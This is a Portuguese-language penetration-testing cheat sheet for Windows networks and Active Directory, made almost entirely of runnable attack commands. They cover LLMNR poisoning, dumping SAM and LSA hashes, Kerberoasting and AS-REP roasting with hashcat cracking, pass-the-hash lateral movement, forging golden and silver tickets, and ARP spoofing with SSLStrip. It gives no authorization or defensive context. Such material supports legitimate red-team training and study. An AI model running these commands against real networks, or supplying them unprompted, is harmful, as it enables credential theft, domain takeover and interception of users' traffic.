Network Penetration Testing e Active Directory

# Nmap — scan de rede completa
nmap -sn 192.168.1.0/24          # Host discovery
nmap -sV -sC 192.168.1.0/24      # Service detection + scripts
nmap -p- -T4 192.168.1.0/24      # Full port scan

# Masscan — para redes grandes
masscan 10.0.0.0/8 -p 80,443,445,3389 --rate 10000

# ARP scan (local)
arp-scan --localnet

# Netdiscover
netdiscover -r 192.168.1.0/24

# Responder para LLMNR/NBT-NS poisoning
responder -I eth0 -dwPv
# Captura hashes NTLMv2 de máquinas Windows

# Impacket (Python toolkit para AD)
# Enumerate users
impacket-lookupsid domain/user:[email protected]

# Enumerate shares
impacket-smbclient domain/user:[email protected]

# Enumerate sessions
impacket-sessions domain/user:[email protected]

# enum4linux
enum4linux -a 192.168.1.10

# SMBMap
smbmap -H 192.168.1.10 -u user -p pass
smbmap -H 192.168.1.10 -R       # Recursive listing

# CrackMapExec (swiss army knife)
crackmapexec smb 192.168.1.0/24
crackmapexec smb 192.168.1.0/24 -u user -p pass --shares
crackmapexec smb 192.168.1.0/24 -u user -p pass --sam    # Dump local hashes
crackmapexec smb 192.168.1.0/24 -u user -p pass --lsa    # LSA secrets

# BloodHound (visualizar caminhos de ataque)
bloodhound-python -u user -p pass -d target.local -c All -dc dc.target.local
# Importar dados no BloodHound GUI
# Identificar: Shortest Path to Domain Admin

# Obter tickets de serviços (SPNs)
impacket-GetUserSPNs target.local/user:pass -dc-ip 192.168.1.10 -request
# Output: TGS tickets em formato hashcat

# Crack offline
hashcat -m 13100 tickets.txt /wordlists/rockyou.txt
john tickets.txt --wordlist=/wordlists/rockyou.txt --format=krb5tgs

# Rubeus (ferramenta Windows)
.\Rubeus.exe kerberoasting /outfile:hashes.txt

# Usuários sem Kerberos pre-auth requerida
impacket-GetNPUsers target.local/ -dc-ip 192.168.1.10 -request -usersfile users.txt

# Crack
hashcat -m 18200 asrep.txt /wordlists/rockyou.txt

# Usar hash NTLM em vez de senha
impacket-psexec target.local/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:HASH

impacket-wmiexec target.local/[email protected] -hashes :HASH

impacket-smbexec target.local/[email protected] -hashes :HASH

# CrackMapExec com hash
crackmapexec smb 192.168.1.10 -u admin -H HASH

# Evil-WinRM com hash
evil-winrm -i 192.168.1.10 -u admin -H HASH

# PsExec (via SMB)
impacket-psexec domain/admin:[email protected]

# WMI
impacket-wmiexec domain/admin:[email protected]

# WinRM
evil-winrm -i 192.168.1.11 -u admin -p pass

# DCOM
impacket-dcomexec domain/admin:[email protected]

# RDP
xfreerdp /v:192.168.1.11 /u:admin /p:pass /dynamic-resolution

# SSH (se Linux)
ssh [email protected]

# Golden Ticket (requer krbtgt hash)
impacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain target.local administrator
export KRB5CCNAME=administrator.ccache
impacket-psexec -k -no-pass dc.target.local

# Silver Ticket (requer service account hash)
impacket-ticketer -nthash SVC_HASH -domain-sid S-1-5-21-xxx -domain target.local -spn cifs/dc.target.local administrator

# ARP Spoofing
arpspoof -i eth0 -t 192.168.1.50 192.168.1.1    # Gateway spoof
arpspoof -i eth0 -t 192.168.1.1 192.168.1.50     # Reverse spoof

# Bettercap (swiss army knife)
bettercap -iface eth0
> net.probe on
> arp.spoof on
> net.sniff on

# SSLStrip (downgrade HTTPS)
bettercap -iface eth0
> set http.proxy.sslstrip true
> http.proxy on

# Responder (LLMNR/NBT-NS)
responder -I eth0 -dwPv
# Captura hashes NTLMv2 quando Windows tenta resolver nomes
# Crack com hashcat:
hashcat -m 5600 ntlmv2.txt /wordlists/rockyou.txt